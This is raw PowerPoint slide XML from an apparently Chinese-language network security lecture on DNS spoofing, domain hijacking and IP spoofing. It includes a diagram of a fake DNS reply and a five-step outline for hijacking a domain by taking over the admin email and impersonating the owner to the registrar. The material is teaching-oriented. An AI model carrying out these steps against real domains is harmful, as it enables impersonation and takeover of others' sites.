            <a:fld id="{1E0D5A8D-8F17-4116-B6E6-F24411625201}"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bwMode="auto">
          <a:noFill/>
          <a:ln>
            <a:miter lim="800000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" anchorCtr="0" compatLnSpc="1"/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{364857B9-7B62-4F81-9C37-48265A6B9EB4}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="225282" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>欺骗（域名劫持）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79876" name="Text Box 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1981200" y="2895600"/>
            <a:ext cx="657225" cy="379413"/>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zh-CN" altLang="en-US" sz="1800" b="1"/>
              <a:t>用户</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79877" name="Line 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3346450" y="2938463"/>
            <a:ext cx="1871663"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78" name="Text Box 7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3104201" y="2276475"/>
            <a:ext cx="2297425" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>请问</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>www.usa.com</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1800" b="1">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRP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a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800" b="1">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79879" name="Text Box 8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5246688" y="2894013"/>
            <a:ext cx="1763712" cy="379412"/>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en-US" altLang="zh-CN" sz="1800" b="1"/>
              <a:t>DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800" b="1"/>
              <a:t>服务器</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79880" name="Line 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="3321050" y="3201988"/>
            <a:ext cx="18002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1" name="Text Box 10"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3062288" y="3230563"/>
            <a:ext cx="24574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0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>www.usa.com</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1800" b="1">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRP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地址是199.6.6.9</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800" b="1">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17418" name="Text Box 12"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4872038" y="4452938"/>
            <a:ext cx="1925637" cy="379412"/>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en-US" altLang="zh-CN" sz="1800" b="1"/>
              <a:t>hack.haha.com</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1800" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17419" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5454650" y="4105275"/>
            <a:ext cx="644525" cy="3667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0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>主机</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800" b="1">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79884" name="Line 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2305050" y="3429000"/>
            <a:ext cx="0" cy="1223963"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="31750">
            <a:solidFill>
              <a:srgbClr val="FF6600"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="none" w="sm" len="sm"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79885" name="Line 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2305050" y="4652963"/>
            <a:ext cx="24479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6" name="Text Box 17"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2692400" y="4221163"/>
            <a:ext cx="1187450" cy="369887"/>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9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>访问</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WEB</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800" b="1">
              <a:solidFill>
                <a:srgbClr val="FF9900"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="225298" name="Text Box 18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="214313" y="2857500"/>
            <a:ext cx="1843087" cy="6461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0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>返回假</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>地址：</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800" b="1">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>202.109.2.2</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800" b="1">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="225300" name="Text Box 20"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1928813" y="4714875"/>
            <a:ext cx="27495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FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>www.usa.com</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1800" b="1">
              <a:solidFill>
                <a:srgbClr val="FF9900"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>地址是</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>202.109.2.2</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800" b="1">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Text Box 8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1000125" y="1857375"/>
            <a:ext cx="2143125" cy="369888"/>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zh-CN" altLang="en-US" sz="1800" b="1"/>
              <a:t>假冒</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="1800" b="1"/>
              <a:t>DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800" b="1"/>
              <a:t>（攻击者）</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="1800" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Line 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2357438" y="2214563"/>
            <a:ext cx="142875" cy="642937"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="31750">
            <a:solidFill>
              <a:srgbClr val="FF6600"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="triangle" w="lg" len="lg"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Line 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1851025" y="2286000"/>
            <a:ext cx="149225" cy="571500"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="31750">
            <a:solidFill>
              <a:srgbClr val="FF6600"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="none" w="sm" len="sm"/>
            <a:tailEnd type="triangle" w="lg" len="lg"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyP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8"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="31" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="17418"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="32" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="174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additive="base">
                                        <p:cTn id="35" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="17419"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="36"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animBg="1"/>
      <p:bldP spid="17419" grpId="0"/>
      <p:bldP spid="225298" grpId="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="225300" grpId="0" autoUpdateAnimBg="0"/>
      <p:bldP spid="19" grpId="0" animBg="1"/>
      <p:bldP spid="20" grpId="0" animBg="1"/>
      <p:bldP spid="21" grpId="0" animBg="1"/>
    </p:bld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r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>1.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>获得要劫持的域名注册信息</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>网络解决方案公司：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>www.networksolutions.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>控制该管理域名的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>E-MAIL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>帐号</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>3.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>修改该域名在网络解决方案公司的注册信息</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>4.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>冒充拥有者使用管理域名的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>E-MAIL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>帐号收发网络解决方案公司确认函</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>5.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>在新指定的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>服务器加进该域名记录</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="225282" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>欺骗（域名劫持）步骤</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{CAC3C421-99B2-4ED9-BF40-51BB15CF9114}"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387075" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>动机：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>隐藏自己的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>地址，防止被跟踪</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>地址作为授权依据</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>穿越防火墙</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>形式：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>单向</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>欺骗：不考虑回传的数据包</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>双向</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>欺骗：要求看到回传的数据包</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>更高级的欺骗：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>会话劫持</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="387074" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9364C90E-7C0E-4D0A-B08B-3CD91BF7C110}"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7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7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870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87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87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87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70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87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autoUpdateAnimBg="0" build="p"/>
    </p:bld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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>盗用：用网络配置工具改变机器的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>地址</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="226306" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>欺骗：改变自己的地址</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54DEF5F8-33FB-4BBF-888D-C6E9F8BC7FC9}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="226308" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2051720" y="2564904"/>
            <a:ext cx="3848100" cy="3705225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:pull/>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27331" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
